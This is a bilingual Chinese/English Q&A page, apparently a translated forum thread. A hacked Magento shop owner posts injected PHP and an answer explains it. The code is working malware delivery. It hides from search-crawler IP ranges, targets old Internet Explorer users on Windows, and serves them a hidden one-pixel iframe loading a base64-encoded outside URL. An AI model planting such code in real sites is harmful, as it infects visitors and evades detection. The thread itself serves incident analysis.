PHP Web 应用程序 (Magento) 被黑;该骇客程式码有什么作用? [英] PHP Web Application (Magento) hacked; What does this hacker code do?
本文介绍了PHP Web 应用程序 (Magento) 被黑;该骇客程式码有什么作用?的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!
问题描述
我刚被Magento 1.3.2.4安装破解.您能告诉我这段代码的目的是什么吗?
I was just hacked on my Magento 1.3.2.4 installation. Can you tell me what is the purpose of this code?
此外,如何阻止这种情况以及如何发现漏洞?
Also, how to stop this and how to spot the vulnerability?
谢谢
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}
$ip=$_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$user_agent = $_SERVER["HTTP_USER_AGENT"];
$IP = $_SERVER['REMOTE_ADDR'].".log";
@mkdir('/tmp/Location/');
$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');
if(!file_exists("/tmp/Location/{$IP}"))
{
if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)
{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';
touch ("/tmp/Location/{$IP}");
}}}}
推荐答案
它创建了一个iframe,可将人们定向到另一个站点.dfjgkbl变量包含URL的base64编码;如果您想知道它是什么,可以使用在线base64解码器.我不会在此处粘贴它,因为根据您其余的代码,该URL可能包含Windows病毒.
It creates an iframe that directs people to another site. The dfjgkbl variable contains the base64 encoding of the URL; there are online base64 decoders available if you wish to know what it is. I won't paste it here because the URL likely contains a Windows virus, based on the rest of your code.
这篇关于PHP Web 应用程序 (Magento) 被黑;该骇客程式码有什么作用?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
查看全文
